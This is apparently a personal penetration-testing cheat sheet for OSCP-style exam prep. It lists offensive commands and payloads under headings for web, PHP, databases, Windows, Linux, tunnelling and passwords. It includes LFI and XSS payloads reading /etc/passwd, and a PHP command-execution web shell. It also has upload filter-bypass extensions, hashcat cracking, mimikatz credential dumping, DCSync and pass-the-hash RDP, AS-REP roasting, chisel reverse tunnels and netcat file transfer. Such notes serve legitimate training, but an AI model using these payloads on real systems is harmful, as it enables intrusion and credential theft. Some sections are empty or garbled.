Prep
Prep
```
nmap -vvv -Pn -sVC -p- -iL hosts.txt -oA scan
sudo nmap -vvv -Pn -sU -p- 192.168.195.222
add to /etc/hosts
```
#### curl
```
curl -v http://<DOMAIN> // verbose output
curl -X POST http://<DOMAIN> // use POST method
curl -X PUT http://<DOMAIN> // use PUT method
curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd // use --
path-as-is to handle /../ or /./ in the given URL
curl --proxy http://127.0.0.1:8080 // use proxy
curl -F myFile=@<FILE> http://<RHOST> // file upload
curl${IFS}<LHOST>/<FILE> // Internal Field Separator (IFS) example
```
#### web
```
---jwt
python3 ~/Desktop/oscp/useful/jwt_tool/jwt_tool.py <JWT>
[https://jwt.io](https://jwt.io/)
---lfi
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u
http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
---xss to lfi
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
---api
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
---file discovery
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H
'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc
200,204,301,302,307,401,403,500 -ic -
e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.do
t,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.pht
ml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,
.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
---post request
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-
medium.txt -u http://<RHOST>/api/ -e -s 200
---dns recon
gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-
5000.txt
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-
top1million-110000.txt
---joomla
[https://github.com/oppsec/juumla](https://github.com/oppsec/juumla)
---drupal
[https://github.com/SamJoan/droopescan](https://github.com/SamJoan/droopescan)
---magento
[https://github.com/steverobbins/magescan](https://github.com/steverobbins/magescan)
```
#### WPScan
```
wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
```
#### PHP
```
---php-filter
url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php
<?php
system($_G{}ET["cmd"]);
?>
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami
---filter bypass
.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg
<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg
```
#### Gittooll
```
./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/
```
#### DB
```
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
sudo mssqlclient.py <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-auth
mongo "mongodb://localhost:27017"
mssql
sqlcmd -S <RHOST> -U <USERNAME>
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1;
mysql
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
SELECT LOAD_FILE('/etc/passwd')
postgres
psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
```
#### Shell
```
(https://github.com/ivan-sincek/php-reverse-shell)
(https://github.com/tennc/webshell)
(https://github.com/TheBinitGhimire/Web-Shells)
```
#### ftp
```
ftp <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>
```
#### password
```
hashcat -m 0 md5 /usr/share/wordlists/rockyou.txt
hashcat -m 100 sha-1 /usr/share/wordlists/rockyou.txt
hashcat -m 1400 sha256 /usr/share/wordlists/rockyou.txt
hashcat -m 3200 bcrypt /usr/share/wordlists/rockyou.txt
hashcat -m 900 md4 /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 1800 sha512 /usr/share/wordlists/rockyou.txt
hashcat -m 160 hmac-sha1 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3
aesrep
hashcat -m 18200 -a 0 <FILE> <FILE>
kerb
hashcat -m 13100 --force <FILE> /usr/share/wordlists/rockyou.txt
#### evil-winrm
```
evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k
/PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S
```
#### rdp
```
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution
+clipboard
xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla
```
#### smb
```
smbclient -L \\<RHOST>\ -N
smbclient -L //<RHOST>/ -N
smbclient -L ////<RHOST>/ -N
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient //<RHOST>/<SHARE> -U <USERNAME>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient "\\\\<RHOST>\<SHARE>"
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY
IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
smbclient --no-pass //<RHOST>/<SHARE>
```
#### impacket
```
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile
hashes.asreproast
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>
```
#### windows
```
dir /a
dir /a:d
dir /a:h
dir flag* /s /p
dir /s /b *.log
systeminfo
whoami /all
net user
net user /domain
net user <USERNAME>
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
accesschk.exe -uws "Everyone" "C:\Program Files\"
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
```
#### mimikatz
```
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
```
#### linux
```
suid/sudo/read
[https://gtfobins.github.io](https://gtfobins.github.io/)
id
sudo -l
uname -a
env
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
ls -la /opt
capsh --print
```
#### tunelling
```
reverse
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:3000:127.0.0.1:3000
socks
./chisel server -p 5000 -reverse -v
./chisel client 192.168.45.230:5000 R:socks
```
#### ssh
```
```
#### file trnsfer
```
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>
```
#### phishing
```
```